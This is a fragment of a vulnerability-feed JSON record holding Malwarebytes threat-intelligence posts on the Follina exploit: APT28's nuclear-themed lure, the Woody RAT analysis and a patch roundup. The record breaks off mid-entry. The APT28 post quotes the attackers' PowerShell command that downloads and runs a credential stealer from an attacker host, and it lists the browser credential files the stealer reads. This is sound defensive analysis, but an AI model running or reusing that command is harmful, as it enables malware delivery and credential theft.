"MALWAREBYTES:6AC81D4001C847401760BE111E21585B", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/faq-mitigating-microsoft-offices-follina-zero-day/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-23T14:35:47", "description": "_This blog post was authored by Hossein Jazi and Roberto Santos_.\n\nIn a recent campaign, APT28, an advanced persistent threat actor linked with Russian intelligence, set its sights on Ukraine, targeting users with malware that steals credentials stored in browsers.\n\nAPT28 (also known as Sofacy and Fancy Bear) is a notorious Russian threat actor that has been active since at least 2004 with its main activity being collecting intelligence for the Russian government. The group is known to have targeted US politicians, and [US organizations](<https://blog.malwarebytes.com/reports/2021/07/beware-password-spraying-fancy-bears/>), including US nuclear facilities.\n\nOn June 20, 2022, Malwarebytes Threat Intelligence [identified](<https://twitter.com/h2jazi/status/1538957205210337280>) a document that had been weaponized with the [Follina](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/05/microsoft-office-zero-day-follina-its-not-a-bug-its-a-feature-its-a-bug/>) (CVE-2022-30190) exploit to download and execute a new .Net stealer first reported by [Google](<https://blog.google/threat-analysis-group/update-on-cyber-activity-in-eastern-europe/>). The discovery was also made [independently by CERT-UA](<https://cert.gov.ua/article/341128>).\n\nFollina is a recently-discovered zero-day exploit that uses the `ms-msdt` protocol to load malicious code from Word documents when they are opened. This is the first time we've observed APT28 using Follina in its operations. \n\n## The malicious document\n\nThe maldoc's filename, `Nuclear Terrorism A Very Real Threat.rtf`, attempts to get victims to open it by preying on their fears that the invasion of Ukraine will escalate into a nuclear conflict. \n\nThe content of the document is an article from the [Atlantic Council](<https://www.atlanticcouncil.org/blogs/new-atlanticist/will-putin-use-nuclear-weapons-in-ukraine-our-experts-answer-three-burning-questions/>) called "_Will Putin use nuclear weapons in Ukraine? Our experts answer three burning questions_" published on May 10 this year.\n\nThe lure asks "Will Putin use nuclear weapons in Ukraine?"\n\nThe maldoc is a docx file (pretending to be a RTF file) compiled on June 10, which suggests that the attack was used around the same time. It uses a remote template embedded in the `Document.xml.rels` file to retrieve a remote HTML file from the URL [http://kitten-268.frge.io/article.html](<https://www.virustotal.com/gui/url/9863b9b4ae9c555cd4dc30803000ea202f642a37321da2222fec9d51bce443b1>).\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/06/malicious-html-document.png> \"\" )The malicious HTML document\n\nThe HTML file uses a JavaScript call to `window.location.href` to load and execute an encoded PowerShell script using the `ms-msdt` MSProtocol URI scheme. The decoded script uses `cmd` to run PowerShell code that downloads and executes the final payload:\n \n \n \"C:\\WINDOWS\\system32\\cmd.exe\" /k powershell -NonInteractive -WindowStyle Hidden -NoProfile -command \"& {iwr http://kompartpomiar.pl/grafika/SQLite.Interop.dll -OutFile \"C:\\Users\\$ENV:UserName\\SQLite.Interop.dll\";iwr http://kompartpomiar.pl/grafika/docx.exe -OutFile \"C:\\Users\\$ENV:UserName\\docx.exe\";Start-Process \"C:\\Users\\$ENV:UserName\\docx.exe\"}\"\n\n## Payload Analysis\n\nThe final payload is a variant of a stealer APT28 has [used against targets in Ukraine](<https://blog.google/threat-analysis-group/update-on-cyber-activity-in-eastern-europe/>) before. In the oldest variant, the stealer used a fake error message to hide what it was doing (A secondary thread was displaying this error message while the main program continued executing.) The new variant does not show the popup. \n\nIn older versions of the stealer, a fake error message distracted users \n\nThe variant used in this attack is almost identical to the one reported by Google, with just a few minor refactors and some additional sleep commands.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/06/comparing-version-one-and-version-two-of-the-malicious-stealer.png> \"\" )A side-by-side comparison of two versions of the APT28 stealer\n\nAs with the previous variant, the stealer's main pupose is to steal data from several popular browsers.\n\n### Google Chrome and Microsoft Edge\n\nThe malware steals any website credentials (username, password, and url) users have saved in the browser by reading the contents of `%LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\Login Data`.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/06/debugging-session-1.png> \"\" )Debugging session showing how attackers are capable of stealing credentials\n\nIn a very similar way, the new variant also grabs all the saved cookies stored in Google Chrome by accessing `%LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\Network\\Cookies`. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/06/cookie-stealing.png> \"\" )Cookie stealing code (Google Chrome)\n\nStolen cookies can sometimes be used to break into websites even if the username and password aren't saved to the browser.\n\nThe code to steal cookies and passwords from the Chromium-based Edge browser is almost identical to the code used for Chrome.\n\n### Firefox\n\nThis malware can also steal data from Firefox. It does this by iterating through every profile looking for the `cookies.sqlite` file that stores the cookies for each user.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/06/cookie-stealing-firefox.png> \"\" )Sysmon capturing access to cookies.sqlite file\n\nIn the case of passwords, the attackers attempt to steal `logins.json`, `key3.db`, `key4.db`, `cert8.db`, `cert9.db`, `signons.sqlite`.\n\nAttackers will grab also passwords from Firefox\n\nThese files are necessary for recovering elements like saved passwords and certificates. Old versions are also supported (`signons.sqlite`, `key3.db` and `cert8.db` are no longer used by new Firefox versions). Note that if the user has set a master password, the attackers will likely attempt to crack this password offline, later, to recover these credentials.\n\n## Exfiltrating data\n\nThe malware uses the IMAP email protocol to exfiltrate data to its command and control (C2) server.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/06/imap-login-event.png> \"\" )The IMAP login event\n\nThe old variant of this stealer connected to mail[.]sartoc.com (144.208.77.68) to exfiltrate data. The new variant uses the same method but a different domain, www.specialityllc[.]com. Interestingly both are located in Dubai.\n\nIt's likely the owners of the C2 websites have nothing to do with APT28, and the group simply took advantage of abandoned or vulnerable sites.\n\nAlthough ransacking browsers might look like petty theft, passwords are the key to accessing sensitive information and intelligence. The target, and the involvement of APT28, a division of Russian military intelligence), suggests that campaign is a part of the conflict in Ukraine, or at the very least linked to the foreign policy and military objectives of the Russian state. Ukraine continues to be a battleground for cyberattacks and espionage, as well as devastating kinetic warfare and humanitarian abuses.\n\nFor more coverage of threat actors active in the Ukraine conflict, read our recent article about the efforts of an unknown APT group that has [targeted Russia repeatedly since Ukraine invasion](<https://blog.malwarebytes.com/threat-intelligence/2022/05/unknown-apt-group-has-targeted-russia-repeatedly-since-ukraine-invasion/>).\n\n## Protection\n\nMalwarebytes customers were proactively protected against this campaign thanks to our anti-exploit protection.\n\n\n\n## IOCs\n\n**Maldoc: \n**Nuclear Terrorism A Very Real Threat.rtf \ndaaa271cee97853bf4e235b55cb34c1f03ea6f8d3c958f86728d41f418b0bf01 \n \n**Remote template (Follina): \n**http://kitten-268.frge[.]io/article.html \n \n**Stealer: \n**http://kompartpomiar[.]pl/grafika/docx.exe \n2318ae5d7c23bf186b88abecf892e23ce199381b22c8eb216ad1616ee8877933 \n \n**C2: \n**www.specialityllc[.]com \n[](<https://twitter.com/h2jazi/status/1538957205210337280/photo/1>)\n\nThe post [Russia's APT28 uses fear of nuclear war to spread Follina docs in Ukraine](<https://blog.malwarebytes.com/threat-intelligence/2022/06/russias-apt28-uses-fear-of-nuclear-war-to-spread-follina-docs-in-ukraine/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-21T15:25:09", "type": "malwarebytes", "title": "Russia\u2019s APT28 uses fear of nuclear war to spread Follina docs in Ukraine", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-21T15:25:09", "id": "MALWAREBYTES:69B09CC9DBBA58546698D97B0C4BAAF0", "href": "https://blog.malwarebytes.com/threat-intelligence/2022/06/russias-apt28-uses-fear-of-nuclear-war-to-spread-follina-docs-in-ukraine/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-04T15:17:43", "description": "_This blog post was authored by Ankur Saini and Hossein Jazi_\n\nThe Malwarebytes Threat Intelligence team has identified a new Remote Access Trojan we are calling Woody Rat that has been in the wild for at least one year.\n\nThis advanced custom Rat is mainly the work of a threat actor that targets Russian entities by using lures in archive file format and more recently Office documents leveraging the Follina vulnerability.\n\nBased on a fake domain registered by the threat actors, we know that they tried to target a Russian aerospace and defense entity known as [OAK](<https://en.wikipedia.org/wiki/United_Aircraft_Corporation>).\n\nIn this blog post, we will analyze Woody Rat's distribution methods, capabilities as well as communication protocol.\n\n## Distribution methods \n\nBased on our knowledge, Woody Rat has been distributed using two different formats: archive files and Office documents using the Follina vulnerability.\n\nThe earliest versions of this Rat was typically archived into a zip file pretending to be a document specific to a Russian group. When the Follina vulnerability became known to the world, the threat actor switched to it to distribute the payload, as identified by [@MalwareHunterTeam](<https://twitter.com/malwrhunterteam/status/1534184385313923072>).\n\nThe following diagram shows the overall attack flow used by the threat actor to drop Woody Rat:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure1.png> \"\" )Woody Rat distribution methods\n\n**Archive files**\n\nIn this method, Woody Rat is packaged into an archive file and sent to victims. We believe that these archive files have been distributed using spear phishing emails. Here are some examples of these archive files:\n\n * _anketa_brozhik.doc.zip_: It contains Woody Rat with the same name: _Anketa_Brozhik.doc.exe_.\n * _zayavka.zip_: It contains Woody Rat pretending to be an application (application for participation in the _selection.doc.exe_).\n\n**Follina vulnerability**\n\nThe threat actor is using a Microsoft Office document (_\u041f\u0430\u043c\u044f\u0442\u043a\u0430.docx_) that has weaponized with the Follina (CVE-2022-30190) vulnerability to drop Woody Rat. The used lure is in Russian is called "_Information security memo_" which provide security practices for passwords, confidential information, etc. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure2.png> \"\" )Document lure\n\n## Woody Rat Analysis\n\nThe threat actor has left some debugging information including a pdb path from which we derived and picked a name for this new Rat:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure3.png> \"\" )Debug Information\n\nA lot of CRT functions seem to be statically linked, which leads to IDA generating a lot of noise and hindering analysis. Before initialization, the malware effectively suppresses all error reporting by calling SetErrorMode with 0x8007 as parameter.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure4.png> \"\" )main function\n\nAs we will see later, that malware uses multiple threads and so it allocates a global object and assigns a mutex to it to make sure no two clashing operations can take place at the same time. This object enforces that only one thread is reaching out to the C2 at a given time and that there are no pending requests before making another request. \n\n### Deriving the Cookie\n\nThe malware communicates with its C2 using HTTP requests. To uniquely identify each infected machine, the malware derives a cookie from machine specific values. The values are taken from the adapter information, computer name and volume information, and 8 random bytes are appended to this value to avoid any possible cookie collisions by the malware.\n\nA combination of _GetAdaptersInfo_, _GetComputerNameA_ and _GetVolumeInformationW_ functions are used to retrieve the required data to generate the cookie. This cookie is sent with every HTTP request that is made to the C2.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure5.png> \"\" )get_cookie_data function\n\n### Data encryption with HTTP requests\n\nTo evade network-based monitoring the malware uses a combination of RSA-4096 and AES-CBC to encrypt the data sent to the C2. The public key used for RSA-4096 is embedded inside the binary and the malware formulates the RSA public key blob at runtime using the embedded data and imports it using the _BCryptImportKeyPair_ function.\n\nThe malware derives the key for AES-CBC at runtime by generating 32 random bytes; these 32 bytes are then encrypted with RSA-4096 and sent to the C2. Both the malware and C2 simultaneously use these bytes to generate the AES-CBC key using _BCryptGenerateSymmetricKey_ which is used in subsequent HTTP requests to encrypt and decrypt the data. For encryption and decryption the malware uses _BCryptEncrypt_ and _BCryptDecrypt_ respectively.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure6.png> \"\" )RSA Encryption routine\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure7.png> \"\" )AES Encryption Routine\n\n### C2 HTTP endpoint request\n\n**knock** - This is the first HTTP request that the malware makes to the C2. The machine-specific cookie is sent as part of the headers here. This is a POST request and the data of this request contains 32 random bytes which are used to derive AES-CBC key, while the 32 bytes are RSA-4096 encrypted.\n\nThe data received as response for this request is decrypted and it contains the url path to submit (/submit) the additional machine information which the malware generates after this operation.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure8.png> \"\" )knock request headers\n\n**submit **- This endpoint request is used to submit information about the infected machine. The data sent to the C2 is AES-CBC encrypted. [Data](<https://gist.github.com/kernelm0de/fd018d58ebe78f603a13b2eba7f01917>) sent via submit API includes:\n\n * OS\n * Architecture\n * Antivirus installed\n * Computer Name\n * OS Build Version\n * .NET information\n * PowerShell information\n * Python information (Install path, version etc.)\n * Storage drives - includes Drive path, Internal name etc.\n * Environment Variables\n * Network Interfaces\n * Administrator privileges\n * List of running processes\n * Proxy information\n * Username\n * List of all the User accounts\n\nThe malware currently detects 6 AVs through Registry Keys; these AVs being Avast Software, Doctor Web, Kaspersky, AVG, ESET and Sophos.\n\n**ping** - The malware makes a ping GET http request to the C2 at regular intervals. If the C2 responds with "_CRY" then the malware proceeds to send the knock request again but if the C2 responds with "_ACK" the response contains additional information about which command should be executed by the malware.\n\nThe malware supports a wide variety of commands which are classified into _SET and _REQ requests as seen while analyzing the malware. We will dive into all these commands below in the blog.\n\n### C2 Commands\n\nThe malware uses a specific thread to communicate with the C2 and a different one to execute the commands received from the C2. To synchronize between both threads, the malware leverages events and mutex. To dispatch a command it modifies the state of the event linked to that object. We should note all the communications involved in these commands are AES encrypted.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure9.png> \"\" )Command execution routine\n\n**_SET Commands**\n\n * **PING** - This command is used to set the sleep interval between every ping request to the C2.\n * **PURG** - Unknown command\n * **EXIT** - Exit the command execution thread.\n\n**_REQ Commands**\n\n * **EXEC** (Execute)- Executes the command received from the C2 by creating a cmd.exe process, the malware creates two named pipes and redirects the input and output to these pipes. The output of the command is read using _ReadFile_ from the named pipe and then "_DAT" is appended to this data before it is AES encrypted and sent to the C2.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure10.png> \"\" )EXEC command\n\n * **UPLD** (Upload) - The Upload command is used to remotely upload a file to the infected machine. The malware makes a GET request to the C2 and receives data to be written as file. \n * **INFO** (Submit Information) - The INFO command is similar to the "submit" request above; this command sends the exact information to the C2 as sent by the "submit" request.\n\nINFO command\n\n * **UPEX** (Upload and Execute) - This is a combination of UPLD and EXEC command. The commands first writes a file received from the C2 and then executes that file.\n * **DNLD** (Download) - The DNLD command allows the C2 to retrieve any file from the infected machine. The malware encrypts the requested file and sends the data via a POST request to the C2.\n * **PROC** (Execute Process) - The PROC command is similar to the EXEC command with slight differences, here the process is directly executed instead of executing it with cmd.exe as in EXEC command. The command uses the named pipes in similar fashion as used by the EXEC command.\n * **UPPR** (Upload and Execute Process) - This is a combination of UPLD and PROC command. The command receives the remote file using the upload command then executes the file using PROC command.\n * **SDEL** (Delete File) - This is used to delete any file on the infected system. It also seems to overwrite the first few bytes of the file to be deleted with random data.\n * **_DIR** (List directory) - This can list all the files and their attributes in a directory supplied as argument. If no directory is supplied, then it proceeds to list the current directory. File attributes retrieved by this command are:\n * Filename\n * Type (Directory, Unknown, File)\n * Owner\n * Creation time\n * Last access time\n * Last write time\n * Size\n * Permissions\n * **STCK** (Command Stack) - This allows the attacker to execute multiple commands with one request. The malware can receive a STCK command which can have multiple children commands which are executed in the same order they are received by the malware.\n * **SCRN** (Screenshot) - This command leverages Windows GDI+ to take the screenshot of the desktop. The image is then encrypted using AES-CBC and sent to the C2.\n * **INJC** (Process Injection) - The malware seems to generate a new AES key for this command. The code to be injected is received from the C2 and decrypted. To inject the code into the target process it writes it to the remote memory using WriteProcessMemory and then creates a remote thread using CreateRemoteThread.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure12.png> \"\" )INJC routine\n\n * **PSLS** (Process List) - Calls _NtQuerySystemInformation_ with _SystemProcessInformation_ to retrieve an array containing all the running processes. Information sent about each process to the C2: \n * PID\n * ParentPID\n * Image Name\n * Owner\n * **DMON** (Creates Process) - The command seems similar to PROC with the only difference being the output of the process execution is not sent back to the C2. It receives the process name from the C2 and executes it using CreateProcess.\n * **UPDM** (Upload and Create Process) - Allows the C2 and upload a file and then execute it using DMON command.\n\n**SharpExecutor and PowerSession Commands**\n\nInterestingly, the malware has 2 .NET DLLs embedded inside. These DLLs are named _WoodySharpExecutor_ and _WoodyPowerSession_ respectively. _WoodySharpExecutor_ provides the malware ability to run .NET code received from the C2. _WoodyPowerSession_ on the other hand allows the malware to execute PowerShell commands and scripts received from the C2.\n\n_WoodyPowerSession_ makes use of pipelines to execute these PS commands. The .NET dlls are loaded by the malware and commands are executed via the methods present in these DLLs: \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure13.png> \"\" )SharpExecutor and PowerSession methods\n\nWe will look at the commands utilising these DLLs below:\n\n * **DN_B** (DotNet Binary) - This command makes use of the RunBinaryStdout method to execute Assembly code with arguments received from the C2. The code is received as an array of Base64 strings separated by 0x20 character. \n * **DN_D** (DotNet DLL) - This method provides the attacker a lot more control over the execution. An attacker can choose whether to send the console output back to the C2 or not. The method receives an array of Base64 strings consisting of code, class name, method name and arguments. The DLL loads the code and finds and executes the method based on other arguments received from the C2.\n * **PSSC** (PowerSession Shell Command) - Allows the malware to receive a Base64 encoded PowerShell command and execute it.\n * **PSSS** (PowerSession Shell Script) - This command allows the malware to load and execute a Base64 encoded PowerShell script received from the C2.\n * **PSSM** (PowerSession Shell Module) - This command receives an array of Base64 encoded strings, one of which contains the module contents and the other one contains the module name. These strings are decoded and this module is imported to the command pipeline and then invoked.\n\n### Malware Cleanup\n\nAfter creating the command threads, the malware deletes itself from disk. It uses the more commonly known _ProcessHollowing_ technique to do so. It creates a suspended notepad process and then writes shellcode to delete a file into the suspended process using _NtWriteVirtualMemory_. The entry point of the thread is set by using the _NtSetContextThread_ method and then the thread is resumed. This leads to the deletion of the malware from disk.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure14.png> \"\" )Malware deletes itself\n\n## Unknown threat actor\n\nThis very capable Rat falls into the category of unknown threat actors we track. Historically, Chinese APTs such as Tonto team as well as North Korea with Konni have targeted Russia. However, based on what we were able to collect, there weren't any solid indicators to attribute this campaign to a specific threat actor.\n\nMalwarebytes blocks the Follina exploit that is being leveraged in the latest Woody Rat campaign. We also already detected the binary payloads via our heuristic malware engines.\n\n\n\n## IOCs\n\n**Woody** **Rat**:\n\n * 982ec24b5599373b65d7fec3b7b66e6afff4872847791cf3c5688f47bfcb8bf0\n * 66378c18e9da070629a2dbbf39e5277e539e043b2b912cc3fed0209c48215d0b\n * b65bc098b475996eaabbb02bb5fee19a18c6ff2eee0062353aff696356e73b7a\n * 43b15071268f757027cf27dd94675fdd8e771cdcd77df6d2530cb8e218acc2ce\n * 408f314b0a76a0d41c99db0cb957d10ea8367700c757b0160ea925d6d7b5dd8e\n * 0588c52582aad248cf0c43aa44a33980e3485f0621dba30445d8da45bba4f834\n * 5c5020ee0f7a5b78a6da74a3f58710cba62f727959f8ece795b0f47828e33e80\n * 3ba32825177d7c2aac957ff1fc5e78b64279aeb748790bc90634e792541de8d3\n * 9bc071fb6a1d9e72c50aec88b4317c3eb7c0f5ff5906b00aa00d9e720cbc828d\n\n**C2s:**\n\n * kurmakata.duckdns[.]org\n * microsoft-ru-data[.]ru\n * 194.36.189.179\n * microsoft-telemetry[.]ru\n * oakrussia[.]ru\n\n**Follina Doc:** \n\u041f\u0430\u043c\u044f\u0442\u043a\u0430.docx \nffa22c40ac69750b229654c54919a480b33bc41f68c128f5e3b5967d442728fb \n**Follina html file:** \ngarmandesar.duckdns[.]org:444/uoqiuwef.html \n**Woody Rat url:** \nfcloud.nciinform[.]ru/main.css (edited) \n\n\nThe post [Woody RAT: A new feature-rich malware spotted in the wild](<https://blog.malwarebytes.com/threat-intelligence/2022/08/woody-rat-a-new-feature-rich-malware-spotted-in-the-wild/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-03T21:25:52", "type": "malwarebytes", "title": "Woody RAT: A new feature-rich malware spotted in the wild", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-08-03T21:25:52", "id": "MALWAREBYTES:9E683A8CBB0F4ADB76A7183C47833E13", "href": "https://blog.malwarebytes.com/threat-intelligence/2022/08/woody-rat-a-new-feature-rich-malware-spotted-in-the-wild/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-15T14:57:21", "description": "The June 2022 Patch Tuesday may go down in history as the day that [Follina](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/05/microsoft-office-zero-day-follina-its-not-a-bug-its-a-feature-its-a-bug/>) got patched, but there was a host of other important updates. And not just from Microsoft. Many other software vendors follow the pattern of monthly updates set by the people in Redmond.\n\n## Microsoft\n\nMicrosoft released updates to deal with 60 security vulnerabilities. Undoubtedly the most prominent one is the one that goes by the name of [Follina](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/05/microsoft-office-zero-day-follina-its-not-a-bug-its-a-feature-its-a-bug/>). The Edge browser received five of the patched vulnerabilities .\n\n### Follina, or CVE-2022-30190\n\nA quick recap about Follina. On Monday May 30, 2022, Microsoft issued [CVE-2022-30190](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30190>) regarding a vulnerability in the Microsoft Support Diagnostic Tool (MSDT) in Windows. An in the wild exploit was using a feature in Word to retrieve a HTML file from a remote server, and that HTML file in turn was using MSDT to load code and execute PowerShell commands.\n\n### CVE-2022-30136\n\nAnother critical vulnerability is [CVE-2022-30136](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30136>), a bug in NFS 4.1 which could be exploited over the network by making an unauthenticated, specially crafted call to a Network File System (NFS) service to trigger a Remote Code Execution (RCE). This vulnerability concerns a number of Windows Server products and received a [CVSS](<https://blog.malwarebytes.com/malwarebytes-news/2020/05/how-cvss-works-characterizing-and-scoring-vulnerabilities/>) score of 9.8 out of 10. Last month, Microsoft fixed a similar vulnerability ([CVE-2022-26937](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26937>)) affecting NFS v2.0 and v3.0.\n\n### CVE-2022-30139\n\nSimilar is [CVE-2022-30139](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30139>), a Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution (RCE) vulnerability. This vulnerability is only exploitable if the MaxReceiveBuffer LDAP policy is set to a value higher than the default value. LDAP is a software protocol for enabling anyone to locate data about organizations, individuals and other resources such as files and devices in a network. LDAP is a "lightweight" (smaller amount of code) version of Directory Access Protocol (DAP). In total, seven vulnerabilities in LDAP were found and fixed.\n\n### CVE-2022-30163\n\nNoteworthy as well is [CVE-2022-30163](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30163>) a Windows Hyper-V Remote Code Execution vulnerability that allows an attacker to run a specially crafted application on a Hyper-V guest that could cause the Hyper-V host operating system to execute arbitrary code. Microsoft Hyper-V is a virtualization platform, which enables administrators to virtualize multiple operating systems to run off the same physical server simultaneously.\n\n## More Microsoft news\n\nMicrosoft has also started to phase out Internet Explorer, but more about that in a [separate post](<https://blog.malwarebytes.com/reports/2022/06/its-official-today-you-can-say-goodbye-to-internet-explorer-or-can-you/>).\n\nAnd then there was a storm of criticism about the way Microsoft handled the [SynLapse vulnerability](<https://orca.security/resources/blog/synlapse-critical-azure-synapse-analytics-service-vulnerability/>) in Azure Data Factory and Azure Synapse Pipelines. SynLapse is the name for a critical bug in Azure\u2019s Synapse service that allowed attackers to obtain credentials to other workspaces, execute code, or leak customer credentials to data sources outside of Azure. Rather than dealing with the vulnerability in a way that closed the gap once and for all, Microsoft choose what researchers called a halfhearted way that was easily bypassed in a following attempt. Orca researchers said they were able to bypass Microsoft\u2019s fix for the issue twice before the company put a working fix in place.\n\n## Other vendors\n\nAdobe has released security updates to address vulnerabilities in [multiple products](<https://www.cisa.gov/uscert/ncas/current-activity/2022/06/14/adobe-releases-security-updates-multiple-products>).\n\n[Atlassian](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) released a patch for the [in the wild exploited](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/multiple-adversaries-exploiting-confluence-vulnerability-warns-microsoft/>) Confluence RCE vulnerability.\n\n[Citrix](<https://support.citrix.com/article/CTX460016/citrix-application-delivery-management-security-bulletin-for-cve202227511-and-cve202227512>) fixed two vulnerabilities in Citrix ADM server and Citrix ADM agent.\n\n[Drupal](<https://www.drupal.org/sa-core-2022-011>) fixed two \u201cModerately critical\u201d vulnerabilities.\n\n[GitLab](<https://about.gitlab.com/releases/2022/06/01/critical-security-release-gitlab-15-0-1-released/>) released versions 15.0.1, 14.10.4, and 14.9.5 for GitLab Community Edition (CE) and Enterprise Edition (EE).\n\nGoogle put out updates for [Android](<https://source.android.com/security/bulletin/2022-06-01>) and [Chrome](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/update-chrome-now-four-high-risk-vulnerabilities-found/>).\n\n[SAP](<https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10>) published security notes about some high priority vulnerabilities\n\nStay safe, everyone!\n\nThe post [Update now! Microsoft patches Follina, and many other security updates](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/update-now-microsoft-patches-follina-and-many-other-security-updates/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-15T13:17:05", "type": "malwarebytes", "title": "Update now!\u00a0 Microsoft patches Follina, and many other security updates", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26937", "CVE-2022-30136", "CVE-2022-30139", "CVE-2022-30163", "CVE-2022-30190"], "modified": "2022-06-15T13:17:05", "id": "MALWAREBYTES:0647495F01C9F1847B118A9E32BC6C13", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/update-now-microsoft-patches-follina-and-many-other-security-updates/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "schneier": [{"lastseen": "2022-06-02T16:47:30", "description": "Researchers have [reported](<https://arstechnica.com/information-technology/2022/05/code-execution-0day-in-windows-has-been-under-active-exploit-for-7-weeks/>) a still-unpatched Windows zero-day that is currently being exploited in the wild.\n\nHere's the [advisory](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>), which includes a work-around until a patch is available.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": 